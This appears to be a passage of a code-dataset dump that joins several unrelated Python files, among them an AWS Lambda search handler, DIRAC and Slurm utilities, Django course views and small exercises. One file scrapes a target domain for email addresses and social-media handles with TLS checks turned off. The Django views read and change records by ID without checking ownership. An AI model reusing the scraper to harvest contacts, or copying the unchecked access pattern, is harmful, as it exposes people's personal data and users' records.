DecisionTreeClassifier()\nmodel.fit(X, y)\nlabel1 = model.predict([[1, 1]])\nlabel2 = model.predict([[0, 0]])\nprint('Label1: {}; Label2: {}'.format(label1, label2))\n","sub_path":"test/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"388735467","text":"import json\n\nfrom requests_aws4auth import AWS4Auth\nimport boto3\nimport requests\n\nimport traceback\n\n''' \nInputs:\n product_name: string (optional)\n page: integer (optional)\n'''\n# Function to include the ID and extract docs\ndef getData(x):\n obj = x['_source']\n obj['_id'] = x['_id']\n return obj\n\ndef lambda_handler(event, context):\n try:\n # Set up some credentials for AWS\n region = 'us-east-2' # For example, us-west-1\n service = 'es'\n credentials = boto3.Session().get_credentials()\n awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)\n\n url = 'http://search-slp-es-database-7docgoiohso2wq5yypuwhvsuwq.us-east-2.es.amazonaws.com/'\n\n # Check if request has `page`. Must be an integer.\n page = 0\n if 'page' in event:\n try:\n page = int(event['page'])\n except ValueError:\n return {\n 'statusCode': 400,\n 'body': json.dumps('Bad Request. \\'page\\' must be an integer.')\n }\n\n # If the user doesn't provide a product_name, just search for everything\n if 'product_name' in event:\n query = {\n \"match\": {\n \"product_name\": event['product_name']\n }\n }\n else:\n query = {\n \"match_all\": {}\n }\n\n # Search payload\n payload = {\n \"query\": query,\n \"sort\": [\n { \"date_created\": \"desc\"}\n ],\n \"from\": page * 10\n }\n\n # Make the request\n r = requests.get(url + 'product/_search', auth=awsauth, json=payload)\n print(r.text)\n\n # Gather the data\n data = json.loads(r.text)\n hits = list(map(getData, data['hits']['hits']))\n print(hits)\n\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(hits)\n }\n\n except Exception as e:\n print(e)\n return {\n 'statusCode': 500,\n 'body': json.dumps('Internal Server Error.' + json.dumps(traceback.format_exc()))\n }\n","sub_path":"backend/es_get/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103901590","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nimport urllib3\nurllib3.disable_warnings()\n\nclass req_domain:\n \n email_list = []\n facebook = []\n instagram = []\n \n def __init__(self ,Target ,pages):\n\n self.pages = pages\n self.Target = Target\n header = {\n \"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\"\n }\n\n self.r = requests.get('https://www.{}/{}'.format(self.Target , self.pages) , headers=header , verify=False , timeout= 10)\n if self.r.status_code == 200 or self.r.status_code == 300:\n self.soup = BeautifulSoup(self.r.content , \"html.parser\")\n self.html = self.soup.prettify()\n\n def Get_emails(self):\n \n self.rgx = re.compile(r'[a-zA-Z0-9./-_+#]+'+'@+'+r'[a-zA-Z0-9./-_+#]+' , re.VERBOSE)\n self.tmp_email = re.findall(self.rgx ,self.html)\n\n if len(self.tmp_email) !=0:\n for i in self.tmp_email:\n if i.split('@')[0] not in ('\"',\"'\"):\n self.email_list.append(i)\n \n \n\n\n def get_pages(self):\n\n self.face_rgx = re.compile(r'(?:https?:)?\\/\\/(?:www\\.)?(?:facebook|fb)\\.com\\/(?P(?![A-z]+\\.php)(?!marketplace|gaming|watch|me|messages|help|search|groups)[A-z0-9_\\-\\.]+)\\/?' , re.VERBOSE)\n self.Fac_page = re.findall(self.face_rgx , self.html)\n\n if len(self.Fac_page) != 0:\n for i in self.Fac_page:\n self.facebook.append(i)\n\n self.insta_rgx = re.compile(r'(?:https?:)?\\/\\/(?:www\\.)?(?:instagram\\.com|instagr\\.am)\\/(?P[A-Za-z0-9_](?:(?:[A-Za-z0-9_]|(?:\\.(?!\\.))){0,28}(?:[A-Za-z0-9_]))?)' , re.VERBOSE)\n self.insta_page = re.findall(self.insta_rgx , self.html)\n\n if len(self.insta_page) != 0:\n for i in self.Fac_page:\n self.instagram.append(i)","sub_path":"1N1TOne_EYE/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"234096545","text":"\"\"\" Experiment with face detection and image filtering using OpenCV \"\"\"\n\"\"\" This worked when I ran it on my home computer, but not here for some reason.\nI got permission from a Ninja to push.\"\"\"\n\nimport cv2\nimport numpy as np\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')\nkernel = np.ones((30, 30), 'uint8')\ncap = cv2.VideoCapture('Image_Processing_Test_Video.webm')\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n if ret:\n faces = face_cascade.detectMultiScale(frame, scaleFactor=1.2, minSize=(20, 20))\n for (x, y, w, h) in faces:\n frame[y:y+h, x:x+w, :] = cv2.dilate(frame[y:y+h, x:x+w, :], kernel)\n # cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0))\n # face\n cv2.ellipse(frame, (x+int(w/2), y+int(h/2)), (int(0.9*w/2), int(h/2)), 0, 0, 360, (0, 0, 0), 2)\n # mouth\n cv2.ellipse(frame, (x+int(w/2), y+int(h/2)), (int(w/3), int(h/3)), 0, 45, 135, (0, 0, 0), 2)\n # eyes\n cv2.ellipse(frame, (x+int(2*w/7), y+int(2*h/5)), (int(w/10), int(h/15)), 0, 0, 360, (0, 0, 0), 2)\n cv2.ellipse(frame, (x+int(5*w/7), y+int(2*h/5)), (int(w/10), int(h/15)), 0, 0, 360, (0, 0, 0), 2)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"617133608","text":"# -*- coding: utf-8 -*-\n\"\"\"\nEconomic Policy Analysis with Overlapping Genration Models\nProblem Set #3\nAlexandre B. Sollaci\nThe Univeristy of Chicago\nFall 2016\n\"\"\"\n\nimport numpy as np\n#import scipy.optimize as opt\n#import time\nimport functions_PS3 as functions\n#import matplotlib.pyplot as plt\n#from matplotlib.ticker import MultipleLocator\n#import os\n\n\nS = 80\nnvec = 0.2*np.ones(S)\nfor i in range(int(np.round(2*S/3))):\n nvec[i] = 1.\nA = 1.\nalpha = 0.35\ndelta = 0.05\nbeta = 0.96\nsigma = 3\nL = sum(nvec)\nSS_tol = 1e-13\nEulDiff = True\n\nparams = (nvec, A, alpha, delta)\n\nbvec_guess = 0.1*np.ones(S-1)\n\nb_cnstr, c_cnstr, K_cnstr = functions.feasible(params, bvec_guess)\n\nparams = (beta, sigma, nvec, L, A, alpha, delta, SS_tol, EulDiff)\n\nss_output = functions.get_SS(params, bvec_guess, graphs = True)\n\nb_ss = ss_output['b_ss']\nK_ss = ss_output['K_ss']\nC_ss = ss_output['C_ss']\nmaxiter_TPI = 400\nmindist_TPI = 1e-9\nxi = 0.8\nbvec1 = 0.8*b_ss\nT = 320\nTPI_tol = 1e-9\ntpi_params = (S, T, beta, sigma, nvec, L, A, alpha, delta, b_ss, K_ss, C_ss,\n maxiter_TPI, mindist_TPI, xi, TPI_tol, EulDiff)\n\ntpi_output = functions.get_TPI(tpi_params, bvec1, graphs = True)\n\n\n\n","sub_path":"Students/SollaciA/PS3/code/PS3_full.py","file_name":"PS3_full.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"123399368","text":"# 练习:\n# 写一个函数 get_score() 来获取学生输入的成绩(0 ~ 100) 的数,如果用户输入的不是0~100的整数则返回0,否则返回输入的整数\n# 如:\n# def get_score():\n# ...\n# score = get_score()\n# print(\"您输入的成绩是:\", score)\n\n# 方法1 在调用get_score时加入try语句\ndef get_score():\n s = int(input(\"请输入成绩(0~100): \"))\n if not (0 <= s <= 100):\n return 0\n return s\n\ntry:\n score = get_score()\nexcept ValueError:\n # 如果末获取到学生信息,则此时学生成绩为0\n score = 0\nprint(\"您输入的成绩是:\", score)\n\n","sub_path":"python/python/老师笔记/python/day14/day14/exercise/get_score.py","file_name":"get_score.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"188710275","text":"########################################################################\n# File: RequestExecutingAgent.py\n# Author: Krzysztof.Ciba@NOSPAMgmail.com\n# Date: 2013/03/12 15:36:47\n########################################################################\n\n\"\"\" :mod: RequestExecutingAgent\n ===========================\n\n .. module: RequestExecutingAgent\n :synopsis: request executing agent\n .. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com\n\n request processing agent\n\"\"\"\n\n__RCSID__ = '$Id$'\n\n# #\n# @file RequestExecutingAgent.py\n# @author Krzysztof.Ciba@NOSPAMgmail.com\n# @date 2013/03/12 15:36:56\n# @brief Definition of RequestExecutingAgent class.\n# # imports\nimport time\n# # from DIRAC\nfrom DIRAC import gMonitor, S_OK, S_ERROR, gConfig\nfrom DIRAC.Core.Base.AgentModule import AgentModule\nfrom DIRAC.ConfigurationSystem.Client import PathFinder\nfrom DIRAC.Core.Utilities.ProcessPool import ProcessPool\nfrom DIRAC.RequestManagementSystem.Client.ReqClient import ReqClient\nfrom DIRAC.RequestManagementSystem.private.RequestTask import RequestTask\n\n# # agent name\nAGENT_NAME = \"RequestManagement/RequestExecutingAgent\"\n\nclass AgentConfigError( Exception ):\n \"\"\" misconfiguration error \"\"\"\n def __init__( self, msg ):\n \"\"\" ctor\n :param str msg: error string\n \"\"\"\n Exception.__init__( self )\n self.msg = msg\n def __str__( self ):\n \"\"\" str op \"\"\"\n return self.msg\n\n########################################################################\nclass RequestExecutingAgent( AgentModule ):\n \"\"\"\n .. class:: RequestExecutingAgent\n\n request processing agent using ProcessPool, Operation handlers and RequestTask\n \"\"\"\n # # process pool\n __processPool = None\n # # request cache\n __requestCache = {}\n # # requests/cycle\n __requestsPerCycle = 100\n # # minimal nb of subprocess running\n __minProcess = 2\n # # maximal nb of subprocess executed same time\n __maxProcess = 4\n # # ProcessPool queue size\n __queueSize = 20\n # # file timeout\n __fileTimeout = 300\n # # operation timeout\n __operationTimeout = 300\n # # ProcessTask default timeout in seconds\n __taskTimeout = 900\n # # ProcessPool finalization timeout\n __poolTimeout = 900\n # # ProcessPool sleep time\n __poolSleep = 5\n # # placeholder for RequestClient instance\n __requestClient = None\n # # Size of the bulk if use of getRequests. If 0, use getRequest\n __bulkRequest = 0\n\n def __init__( self, *args, **kwargs ):\n \"\"\" c'tor \"\"\"\n # # call base class ctor\n AgentModule.__init__( self, *args, **kwargs )\n # # ProcessPool related stuff\n self.__requestsPerCycle = self.am_getOption( \"RequestsPerCycle\", self.__requestsPerCycle )\n self.log.info( \"Requests/cycle = %d\" % self.__requestsPerCycle )\n self.__minProcess = self.am_getOption( \"MinProcess\", self.__minProcess )\n self.log.info( \"ProcessPool min process = %d\" % self.__minProcess )\n self.__maxProcess = self.am_getOption( \"MaxProcess\", 4 )\n self.log.info( \"ProcessPool max process = %d\" % self.__maxProcess )\n self.__queueSize = self.am_getOption( \"ProcessPoolQueueSize\", self.__queueSize )\n self.log.info( \"ProcessPool queue size = %d\" % self.__queueSize )\n self.__poolTimeout = int( self.am_getOption( \"ProcessPoolTimeout\", self.__poolTimeout ) )\n self.log.info( \"ProcessPool timeout = %d seconds\" % self.__poolTimeout )\n self.__poolSleep = int( self.am_getOption( \"ProcessPoolSleep\", self.__poolSleep ) )\n self.log.info( \"ProcessPool sleep time = %d seconds\" % self.__poolSleep )\n self.__taskTimeout = int( self.am_getOption( \"ProcessTaskTimeout\", self.__taskTimeout ) )\n self.log.info( \"ProcessTask timeout = %d seconds\" % self.__taskTimeout )\n self.__bulkRequest = self.am_getOption( \"BulkRequest\", 0 )\n self.log.info( \"Bulk request size = %d\" % self.__bulkRequest )\n\n # # keep config path and agent name\n self.agentName = self.am_getModuleParam( \"fullName\" )\n self.__configPath = PathFinder.getAgentSection( self.agentName )\n\n # # operation handlers over here\n opHandlersPath = \"%s/%s\" % ( self.__configPath, \"OperationHandlers\" )\n opHandlers = gConfig.getSections( opHandlersPath )\n if not opHandlers[\"OK\"]:\n self.log.error( opHandlers[\"Message\" ] )\n raise AgentConfigError( \"OperationHandlers section not found in CS under %s\" % self.__configPath )\n opHandlers = opHandlers[\"Value\"]\n\n\n self.timeOuts = dict()\n\n # # handlers dict\n self.handlersDict = dict()\n for opHandler in opHandlers:\n opHandlerPath = \"%s/%s/Location\" % ( opHandlersPath, opHandler )\n opLocation = gConfig.getValue( opHandlerPath, \"\" )\n if not opLocation:\n self.log.error( \"%s not set for %s operation handler\" % ( opHandlerPath, opHandler ) )\n continue\n self.timeOuts[opHandler] = { \"PerFile\": self.__fileTimeout, \"PerOperation\": self.__operationTimeout }\n\n opTimeout = gConfig.getValue( \"%s/%s/TimeOut\" % ( opHandlersPath, opHandler ), 0 )\n if opTimeout:\n self.timeOuts[opHandler][\"PerOperation\"] = opTimeout\n fileTimeout = gConfig.getValue( \"%s/%s/TimeOutPerFile\" % ( opHandlersPath, opHandler ), 0 )\n if fileTimeout:\n self.timeOuts[opHandler][\"PerFile\"] = fileTimeout\n\n self.handlersDict[opHandler] = opLocation\n\n self.log.info( \"Operation handlers:\" )\n for item in enumerate ( self.handlersDict.items() ):\n opHandler = item[1][0]\n self.log.info( \"[%s] %s: %s (timeout: %d s + %d s per file)\" % ( item[0], item[1][0], item[1][1],\n self.timeOuts[opHandler]['PerOperation'],\n self.timeOuts[opHandler]['PerFile'] ) )\n\n # # common monitor activity\n gMonitor.registerActivity( \"Iteration\", \"Agent Loops\",\n \"RequestExecutingAgent\", \"Loops/min\", gMonitor.OP_SUM )\n gMonitor.registerActivity( \"Processed\", \"Request Processed\",\n \"RequestExecutingAgent\", \"Requests/min\", gMonitor.OP_SUM )\n gMonitor.registerActivity( \"Done\", \"Request Completed\",\n \"RequestExecutingAgent\", \"Requests/min\", gMonitor.OP_SUM )\n # # create request dict\n self.__requestCache = dict()\n\n self.FTSMode = self.am_getOption( \"FTSMode\", False )\n\n\n\n def processPool( self ):\n \"\"\" facade for ProcessPool \"\"\"\n if not self.__processPool:\n minProcess = max( 1, self.__minProcess )\n maxProcess = max( self.__minProcess, self.__maxProcess )\n queueSize = abs( self.__queueSize )\n self.log.info( \"ProcessPool: minProcess = %d maxProcess = %d queueSize = %d\" % ( minProcess,\n maxProcess,\n queueSize ) )\n self.__processPool = ProcessPool( minProcess,\n maxProcess,\n queueSize,\n poolCallback = self.resultCallback,\n poolExceptionCallback = self.exceptionCallback )\n self.__processPool.daemonize()\n return self.__processPool\n\n def requestClient( self ):\n \"\"\" RequestClient getter \"\"\"\n if not self.__requestClient:\n self.__requestClient = ReqClient()\n return self.__requestClient\n\n def cacheRequest( self, request ):\n \"\"\" put request into requestCache\n\n :param Request request: Request instance\n \"\"\"\n count = 5\n # Wait a bit as there may be a race condition between RequestTask putting back the request and the callback clearing the cache\n while request.RequestName in self.__requestCache:\n count -= 1\n if not count:\n self.requestClient().putRequest( request )\n return S_ERROR( \"Duplicate request, ignore: %s\" % request.RequestName )\n time.sleep( 1 )\n self.__requestCache[ request.RequestName ] = request\n return S_OK()\n\n def putRequest( self, requestName, taskResult = None ):\n \"\"\" put back :requestName: to RequestClient\n\n :param str requestName: request's name\n \"\"\"\n if requestName in self.__requestCache:\n request = self.__requestCache.pop( requestName )\n if taskResult and taskResult['OK']:\n request = taskResult['Value']\n\n reset = self.requestClient().putRequest( request )\n if not reset[\"OK\"]:\n return S_ERROR( \"putRequest: unable to reset request %s: %s\" % ( requestName, reset[\"Message\"] ) )\n else:\n return S_ERROR( 'Not in cache' )\n return S_OK()\n\n def putAllRequests( self ):\n \"\"\" put back all requests without callback called into requestClient\n\n :param self: self reference\n \"\"\"\n self.log.info( \"putAllRequests: will put %s back requests\" % len( self.__requestCache ) )\n for requestName in self.__requestCache.keys():\n reset = self.putRequest( requestName )\n if not reset[\"OK\"]:\n self.log.error( reset[\"Message\"] )\n else:\n self.log.debug( \"putAllRequests: request %s has been put back with its initial state\" % requestName )\n return S_OK()\n\n def initialize( self ):\n \"\"\" initialize agent\n \"\"\"\n return S_OK()\n\n def execute( self ):\n \"\"\" read requests from RequestClient and enqueue them into ProcessPool \"\"\"\n gMonitor.addMark( \"Iteration\", 1 )\n # # requests (and so tasks) counter\n taskCounter = 0\n while taskCounter < self.__requestsPerCycle:\n self.log.debug( \"execute: executing %d request in this cycle\" % taskCounter )\n\n requestsToExecute = []\n\n if not self.__bulkRequest:\n self.log.info( \"execute: ask for a single request\" )\n getRequest = self.requestClient().getRequest()\n if not getRequest[\"OK\"]:\n self.log.error( \"execute: %s\" % getRequest[\"Message\"] )\n break\n if not getRequest[\"Value\"]:\n self.log.info( \"execute: no more 'Waiting' requests to process\" )\n break\n requestsToExecute = [getRequest[\"Value\"] ]\n else:\n numberOfRequest = min( self.__bulkRequest, self.__requestsPerCycle - taskCounter )\n self.log.info( \"execute: ask for %s requests\" % numberOfRequest )\n getRequests = self.requestClient().getBulkRequests( numberOfRequest )\n if not getRequests[\"OK\"]:\n self.log.error( \"execute: %s\" % getRequests[\"Message\"] )\n break\n if not getRequests[\"Value\"]:\n self.log.info( \"execute: no more 'Waiting' requests to process\" )\n break\n for rId in getRequests[\"Value\"][\"Failed\"]:\n self.log.error( \"execute: %s\" % getRequests[\"Value\"][\"Failed\"][rId] )\n\n requestsToExecute = getRequests[\"Value\"][\"Successful\"].values()\n\n self.log.info( \"execute: will execute %s requests \" % len( requestsToExecute ) )\n\n for request in requestsToExecute:\n # # set task id\n taskID = request.RequestName\n # # save current request in cache\n self.cacheRequest( request )\n # # serialize to JSON\n requestJSON = request.toJSON()\n if not requestJSON[\"OK\"]:\n self.log.error( \"JSON serialization error: %s\" % requestJSON[\"Message\"] )\n break\n requestJSON = requestJSON[\"Value\"]\n\n self.log.info( \"processPool tasks idle = %s working = %s\" % ( self.processPool().getNumIdleProcesses(),\n self.processPool().getNumWorkingProcesses() ) )\n\n looping = 0\n while True:\n if not self.processPool().getFreeSlots():\n if not looping:\n self.log.info( \"No free slots available in processPool, will wait %d seconds to proceed\" % self.__poolSleep )\n time.sleep( self.__poolSleep )\n looping += 1\n else:\n if looping:\n self.log.info( \"Free slot found after %d seconds\" % looping * self.__poolSleep )\n looping = 0\n self.log.info( \"spawning task for request '%s'\" % ( request.RequestName ) )\n timeOut = self.getTimeout( request )\n enqueue = self.processPool().createAndQueueTask( RequestTask,\n kwargs = { \"requestJSON\" : requestJSON,\n \"handlersDict\" : self.handlersDict,\n \"csPath\" : self.__configPath,\n \"agentName\": self.agentName },\n taskID = taskID,\n blocking = True,\n usePoolCallbacks = True,\n timeOut = timeOut )\n if not enqueue[\"OK\"]:\n self.log.error( enqueue[\"Message\"] )\n else:\n self.log.debug( \"successfully enqueued task '%s'\" % taskID )\n # # update monitor\n gMonitor.addMark( \"Processed\", 1 )\n # # update request counter\n taskCounter += 1\n # # task created, a little time kick to proceed\n time.sleep( 0.1 )\n break\n\n # # clean return\n return S_OK()\n\n def getTimeout( self, request ):\n \"\"\" get timeout for request \"\"\"\n timeout = 0\n for op in request:\n if op.Status not in ( \"Waiting\", \"Scheduled\", 'Queued' ):\n continue\n if op.Type not in self.timeOuts:\n timeout += self.__operationTimeout\n else:\n perOp = self.timeOuts[op.Type].get( \"PerOperation\", self.__operationTimeout )\n perFiles = self.timeOuts[op.Type].get( \"PerFile\", self.__fileTimeout ) * len( op )\n timeout += perOp + perFiles\n self.log.info( \"estimated timeOut for request %s is %s\" % ( request.RequestName, timeout ) )\n return timeout\n\n def finalize( self ):\n \"\"\" agent finalization \"\"\"\n if self.__processPool:\n self.processPool().finalize( timeout = self.__poolTimeout )\n self.putAllRequests()\n return S_OK()\n\n def resultCallback( self, taskID, taskResult ):\n \"\"\" definition of request callback function\n\n :param str taskID: Request.RequestName\n :param dict taskResult: task result S_OK(Request)/S_ERROR(Message)\n \"\"\"\n # # clean cache\n res = self.putRequest( taskID, taskResult )\n self.log.info( \"callback: %s result is %s(%s), put %s(%s)\" % ( taskID,\n \"S_OK\" if taskResult[\"OK\"] else \"S_ERROR\",\n taskResult[\"Value\"].Status if taskResult[\"OK\"] else taskResult[\"Message\"],\n \"S_OK\" if res['OK'] else 'S_ERROR',\n '' if res['OK'] else res['Message'] ) )\n\n\n def exceptionCallback( self, taskID, taskException ):\n \"\"\" definition of exception callback function\n\n :param str taskID: Request.RequestName\n :param Exception taskException: Exception instance\n \"\"\"\n self.log.error( \"exceptionCallback: %s was hit by exception %s\" % ( taskID, taskException ) )\n self.putRequest( taskID )\n","sub_path":"RequestManagementSystem/Agent/RequestExecutingAgent.py","file_name":"RequestExecutingAgent.py","file_ext":"py","file_size_in_byte":15280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"20051625","text":"#Krzysztof Miśkowicz\n\ndef is_primary(n):\n if n == 2 or n == 3:\n return True\n if n < 2 or n % 2 == 0 or n % 3 == 0:\n return False\n divider = 5\n while divider*divider <= n:\n if n % divider == 0 or n % (divider+2) == 0:\n return False\n divider += 6\n\n return True\n\nn_numbers = 1\n\ndef divide(N):\n global n_numbers\n if is_primary(N) and is_primary(n_numbers):\n return True\n\n digits = 1\n while N >= 10 ** digits:\n digits += 1\n\n if digits == 1:\n return False\n\n result = False\n for i in range(1, digits):\n if is_primary(N % (10 ** i)):\n n_numbers += 1\n result = result or divide(N // (10 ** i))\n n_numbers -= 1\n\n return result\n\nprint(divide(273)) # True, podział 2|7|3\nprint(divide(22222)) # True, podział 2|2|2|2|2\nprint(divide(23672)) # True, podział 23|67|2\nprint(divide(2222)) # False\nprint(divide(21722)) # False\n","sub_path":"Kolokwium_2/zad.py","file_name":"zad.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"170482765","text":"from typing import List, Dict, Optional, Callable\n\nfrom trailblazer.apps.slurm.models import SqueueResult\nfrom trailblazer.constants import FileFormat, SlurmJobStatus, TrailblazerStatus\nfrom trailblazer.exc import EmptySqueueError\nfrom trailblazer.io.controller import ReadStream\nfrom trailblazer.apps.slurm.utils import formatters\n\n\ndef get_squeue_result(squeue_response: str) -> SqueueResult:\n \"\"\"Return SqueueResult object from squeue response.\n Raises:\n TrailblazerError: when no entries were returned by squeue command.\n \"\"\"\n if not squeue_response:\n raise EmptySqueueError(\"No jobs found in SLURM registry\")\n squeue_response_content: List[dict] = ReadStream.get_content_from_stream(\n file_format=FileFormat.CSV,\n stream=squeue_response,\n read_to_dict=True,\n )\n return SqueueResult(jobs=squeue_response_content)\n\n\ndef reformat_squeue_result_job_step(data_analysis: str, job_step: str) -> str:\n \"\"\"Standardise job step string according to data analysis.\"\"\"\n formatter: Callable = formatters.formatter_map.get(data_analysis, formatters.reformat_undefined)\n return formatter(job_step=job_step)\n\n\ndef _get_analysis_single_status(jobs_status_distribution: Dict[str, float]) -> str:\n \"\"\"Return true if only one status in jobs statuses.\"\"\"\n if len(jobs_status_distribution) == 1:\n single_status: str = jobs_status_distribution.popitem()[0]\n return (\n TrailblazerStatus.FAILED\n if single_status == SlurmJobStatus.TIME_OUT\n else TrailblazerStatus[single_status.upper()]\n )\n\n\ndef _is_analysis_failed(jobs_status_distribution: Dict[str, float]) -> bool:\n \"\"\"Return true if any job was broken.\"\"\"\n broken_statuses: List[str] = [SlurmJobStatus.FAILED, SlurmJobStatus.TIME_OUT]\n for broken_status in broken_statuses:\n if jobs_status_distribution.get(broken_status):\n return True\n\n\ndef _is_analysis_ongoing(jobs_status_distribution: Dict[str, float]) -> bool:\n \"\"\"Return True if analysis is still ongoing.\"\"\"\n return bool(\n jobs_status_distribution.get(SlurmJobStatus.RUNNING)\n or jobs_status_distribution.get(SlurmJobStatus.PENDING)\n )\n\n\ndef get_current_analysis_status(jobs_status_distribution: Dict[str, float]) -> str:\n \"\"\"Return current analysis status based on jobs status distribution.\"\"\"\n single_analysis_status: Optional[str] = _get_analysis_single_status(\n jobs_status_distribution=jobs_status_distribution\n )\n if single_analysis_status:\n return single_analysis_status\n is_analysis_ongoing: bool = _is_analysis_ongoing(\n jobs_status_distribution=jobs_status_distribution\n )\n is_analysis_failed: bool = _is_analysis_failed(\n jobs_status_distribution=jobs_status_distribution\n )\n if is_analysis_failed:\n return TrailblazerStatus.ERROR if is_analysis_ongoing else TrailblazerStatus.FAILED\n if is_analysis_ongoing:\n return TrailblazerStatus.RUNNING\n return TrailblazerStatus.CANCELLED\n","sub_path":"trailblazer/apps/slurm/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"306326179","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import messages\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.http import HttpResponse\n\nfrom .models import Course\nfrom .forms import CourseForm\nimport datetime\nimport json\n\n# Returns the list page with all courses\ndef index(request):\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n # Fetch courses from db\n courses = Course.objects.order_by('title').filter(is_hidden=False, user_id=request.user.id)\n\n # Pagination\n paginator = Paginator(courses, 10)\n page = request.GET.get('page')\n paged_courses = paginator.get_page(page)\n\n # Data that is passed to the template\n context = {\n 'courses': paged_courses,\n }\n\n # Renders the template with the data that can be accesed\n return render(request, 'courses/course_list.html', context)\n\n# Returns the detail info of a course. Also used to create and update courses\ndef course(request, course_id=0):\n if request.method == \"POST\":\n # Kick user if not logged in\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n # Get the POST form\n form = CourseForm(request.POST)\n\n if form.is_valid():\n course_id = form.cleaned_data['course_id']\n title = form.cleaned_data['title']\n description = form.cleaned_data['description']\n\n # Searches the db for a course with the id and updates it. if not found, creates a new course and returns is_created=True\n course, is_created = Course.objects.update_or_create(\n id=course_id,\n defaults={\n 'title': title,\n 'description': description,\n\t 'user_id': request.user.id\n },\n )\n\n # Save in the db\n course.save()\n\n # If event was created via calendar page, return the id\n if 'is_calendar_form' in request.POST:\n\n context = {\n 'id': course.id,\n 'title': course.title,\n 'description': course.description,\n\t 'user_id': request.user.id\n }\n context = json.dumps(context)\n return HttpResponse(context)\n\n # UI success message\n messages.success(request, 'Course created successfully')\n\n # If it was updated return the page and form\n if not is_created:\n context = {\n 'form': form\n }\n return render(request, 'courses/course_detail.html', context)\n\n # If it was created, redirect to url with id\n return redirect('course_detail', course_id=course.id) #redirect(url path name, id specified in the path)\n\n # Form was invalid, so return it\n context = {\n 'form': form\n }\n\n # UI error message\n messages.error(request, 'Course was not created')\n\n return render(request, 'courses/course_detail.html', context)\n\n else:\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n # If viewing detail of an existing course, fill the form with its values. if not, show form with blank and default values\n context = {}\n\n if course_id > 0:\n course = get_object_or_404(Course, pk=course_id)\n\n form = CourseForm(initial={\n 'course_id': course.id,\n 'title': course.title,\n 'description': course.description\n })\n # Get event notes and exams\n courses = Course.objects.all().filter(title=course.title,is_hidden=False)\n\n context['form'] = form\n context['courses'] = courses\n\n else:\n form = CourseForm(initial={\n })\n\n context['form'] = form\n\n return render(request, 'courses/course_detail.html', context)\n\n# Search for courses \ndef search(request):\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n queryset_list = Course.objects.order_by('title').filter(is_hidden=False, user_id=request.user.id)\n\n # Title\n if 'title' in request.GET:\n title = request.GET['title']\n # Check if empty string\n if title:\n # Search title for anything that matches a keyword\n queryset_list = queryset_list.filter(title__icontains=title)\n\n context = {\n 'courses': queryset_list,\n }\n\n # Request contains at least one form field, return the form with its field values\n if 'title' in request.GET:\n form = CourseForm(initial={\n 'title': request.GET['title']\n })\n\n search_form_defaults(form)\n\n context['form'] = form\n\n # Request does not contain form submission, return empty form\n else:\n form = CourseForm()\n\n search_form_defaults(form)\n\n context['form'] = form\n\n\n return render(request, 'courses/course_search.html', context)\n\n# Marks a course as hidden\ndef remove(request):\n if request.method == 'POST':\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n course_id = request.POST['course_id']\n\n course = Course.objects.get(id=course_id)\n course.is_hidden = True\n course.save()\n\n if 'is_detail' in request.POST:\n return redirect('course_list')\n else:\n return HttpResponse('')\n\n\n# Marks are required fields as not required and adds an 'Any' value to the drop down lists\ndef search_form_defaults(form):\n form.fields['title'].required = False\n","sub_path":"courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"14310046","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import leastsq\nfrom pylab import mpl\n\nmpl.rcParams['font.sans-serif'] = ['Microsoft YaHei'] # 指定默认字体\nmpl.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\n\n\n# 计算以p为参数的直线与原始数据之间误差\ndef f(p):\n k, b = p\n return Y - (k * X + b)\n\n\nif __name__ == '__main__':\n X = np.array([8.19, 